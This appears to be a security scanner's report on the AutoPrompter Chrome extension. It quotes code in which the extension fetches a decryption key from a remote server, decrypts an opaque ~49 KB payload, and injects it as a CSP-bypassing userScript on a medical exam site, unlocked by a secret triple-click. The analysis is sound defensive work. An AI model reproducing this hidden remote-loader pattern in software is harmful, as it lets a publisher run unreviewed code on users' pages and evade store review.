Security Warning: High Security Risk
AutoPrompter
ID: kahamicjejhaidgegolgnglolbmojahl
Supported Languages
Extension Info & Metadata
Publisher Contextual Analysis
- Privacy
- Privacy Policy
- Help
- Help Center
- MX records exist
- Yes
- Domain exists
- Yes
- Is disposable
- No
- Is role-based
- No
- Mailbox exists
- Yes
Automated URL-based prompting for ChatGPT, Claude, and Gemini.
The extension ships a ~49 KB AES-GCM encrypted blob as its primary secondary payload. The plaintext is never visible in the bundle and can only be recovered with a runtime master key, defeating all static analysis. A payload this large (larger than all other JS combined) that is intentionally opaque constitutes real obfuscation, not standard bundler output.
export const encryptedToolkit = { ivHex: 'f105651055d00c9ebfa48eee', payloadHex: '5ebf16b4563c5a47a73c6b03a85792baf1b2e80ea9f0088034090963ff1e6495acd63488dfe6815a97ca5432b81d00f81a1ad1e54d72a3d4e6507bd5252705771cf471b7f94f03cea9ad69a181077b719cd1a734247db351f7c5cf9ce7007987d509ce2527144c68a78c8bb43a7ab713035068adbb939c22cc6fac026cd610eaffb3e29e8e1ac9ee69e543d4aeb61bd40312529cfff3f29288166b1a2297ba989d74e26ecb28c168d71b166eeebe3c960becf7e79c1ce56d979accda381ead626370070c09824796eec5fd96346032 ...The decryption master key for the encrypted toolkit payload is not stored locally β it is fetched from a remote server at `halfpastbored.com`. This gives the publisher the ability to add, revoke, or rotate keys at will, and to update the effective behaviour of the extension without pushing a new version simply by changing what keys decrypt what payload. This is a remote code control mechanism that bypasses Chrome's extension review process.
async function unlockIntegration(pwd) { const encoder = new TextEncoder(); const pwdHashBuf = await crypto.subtle.digest('SHA-256', encoder.encode(pwd)); const pwdHashHex = Array.from(new Uint8Array(pwdHashBuf)) .map(b => b.toString(16).padStart(2, '0')) .join(''); let keysData; try { const res = await fetch('https://halfpastbored.com/extensions/autoprompter/keys.json'); keysData = await res.json(); } catch (_e) { throw new Error('Network error reaching integration server.'); } const entry = keysData[pwdHashHex]; if (!entry) throw new Error('Access denied. Invalid key.');The service worker decrypts the encrypted toolkit payload and registers the resulting plaintext as a `userScript` injected into an arbitrary platform URL (default `*://apps.uworld.com/*`, user-configurable to any pattern). The decrypted code is then executed as a first-class userScript with `csp: "script-src 'self' 'unsafe-inline'"`, bypassing the target page's own CSP. Since the payload content is opaque, the full scope of what executes on these third-party pages cannot be determined by static analysis.
} else if (id === 'toolkit') { // Try to load raw backup first (dev mode) try { const res = await fetch(chrome.runtime.getURL('.private/userscript-backup.js')); code = await res.text(); } catch (_e) { // Decrypt from payload if we have master key try { const { encryptedToolkit } = await import('./toolkit-payload.js'); const mkBuf = new Uint8Array(storage.toolkit_mk.match(/.{1,2}/g) .map(byte => parseInt(byte, 16))); const ivBuf = new Uint8Array(encryptedToolkit.ivHex.match(/.{1,2}/g) .map(byte => parseInt(byte, 16))); const payloadBuf = new Uint8Array(encryptedToolkit.payloadHex.match(/.{1,2}/g) .map(byte => parseInt(byte, 16))); const key = await crypto.subtle.importKey('raw', mkBuf, 'AES-GCM', false, ['decrypt']); const decryptedBuf = await crypto.subtle.decrypt({ name: 'AES-GCM', iv: ivBuf }, key, payloadBuf); const decoder = new TextDecoder(); code = decoder.decode(decryptedBuf); // ... } }}A hidden "Personal Workspace Integration" UI β which unlocks the encrypted toolkit for injection onto UWorld (a medical exam platform) β is triggered only by triple-clicking the extension logo within one second. This secret gesture is not documented, disclosed in the CWS listing, or discoverable by a normal user. Deliberately concealing a secondary feature that injects AI assistance into a medical licensing exam platform behind a secret activation mechanism is a strong indicator of intentional deception to evade policy review.
let logoClickCount = 0;let logoClickTimer = null;let currentMasterKey = null;const targetLogo = document.querySelector('.logo-container');if (targetLogo) { targetLogo.addEventListener('click', () => { logoClickCount++; if (logoClickCount === 3) { document.getElementById('integration-modal').style.display = 'flex'; logoClickCount = 0; document.getElementById('integration-key-input').focus(); } clearTimeout(logoClickTimer); logoClickTimer = setTimeout(() => { logoClickCount = 0; }, 1000); });By severity
Versions scanned
Showing 1 of 3 scanned versions with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 1.0.2 | 4 |
Files with findings
3 distinct paths β top paths by unique finding count:
- options/debug-inject.js2
- background/service-worker.js1
- background/toolkit-payload.js1
URLs
View the external URLs this extension communicates with to understand its network activity and data interactions.
Gain full insight into all external connections.
Upgrade for full visibility.
Gain full insight into all external connections.
Upgrade for full visibility.
Code Diff
Compare extension code between any two versions.
No comparable text files found between these versions.
Browse and explore files within this extension package
Gain full insight into all external connections.
Upgrade for full visibility.